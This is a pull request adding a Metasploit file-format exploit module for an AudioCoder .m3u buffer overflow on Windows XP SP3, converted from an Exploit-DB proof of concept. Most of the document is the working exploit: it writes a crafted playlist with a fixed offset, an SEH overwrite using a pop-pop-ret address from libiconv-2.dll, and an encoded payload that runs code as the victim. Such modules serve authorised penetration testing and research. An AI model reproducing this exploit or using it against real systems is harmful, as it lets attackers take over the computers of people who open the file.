### PR TITLE
Adding windows fileformat exploit module audio_coder_m3u_0_8_28

### DIFF
--- a/modules/exploits/windows/fileformat/audio_coder_m3u_0_8_28.rb
+++ b/modules/exploits/windows/fileformat/audio_coder_m3u_0_8_28.rb
@@ -1,0 +1,73 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'AudioCoder .M3U Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a buffer overflow in AudioCoder 0.8.29.5602. The vulnerability
+        occurs when adding an .m3u, allowing arbitrary code execution with the privileges
+        of the user running AudioCoder. This module has been tested successfully on
+        AudioCoder 0.8.29.5602 over Windows XP SP3 and Windows 7 SP1.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'sajith shetty', # Vulnerability discovery and PoC
+          'Philip OKeefe'  # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'OSVDB', '92939' ],
+          [ 'EDB', '32585' ]
+        ],
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC' => 'process'
+        },
+      'Platform'       => 'win',
+      'Payload'        =>
+        {
+          'Space'           => 5000,
+          'BadChars'        => "\x00\x5c\x40\x0d\x0a",
+          'DisableNops'     => true,
+          'StackAdjustment' => -3500,
+        },
+      'Targets'        =>
+        [
+          [ 'AudioCoder 0.8.29.5602 / Windows XP SP3',
+            {
+              'Ret'     => 0x66010686, # ppr from libiconv-2.dll
+              'Offset'  => 757
+            }
+          ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Mar 03 2014',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),
+      ], self.class)
+  end
+
+  def exploit
+    buffer = "http://"
+    buffer << rand_text(target['Offset'])
+    buffer << generate_seh_record(target.ret)
+    buffer << payload.encoded
+    file_create(buffer)
+  end
+end
+


### PR DESCRIPTION
Converted an exploit from exploit-db.com[1] to a Metasploit module. The msftidy script passes cleanly.

This exploit only works on Windows XP, specifically I tested this on Windows XP SP3. 

[1] http://www.exploit-db.com/exploits/32585/
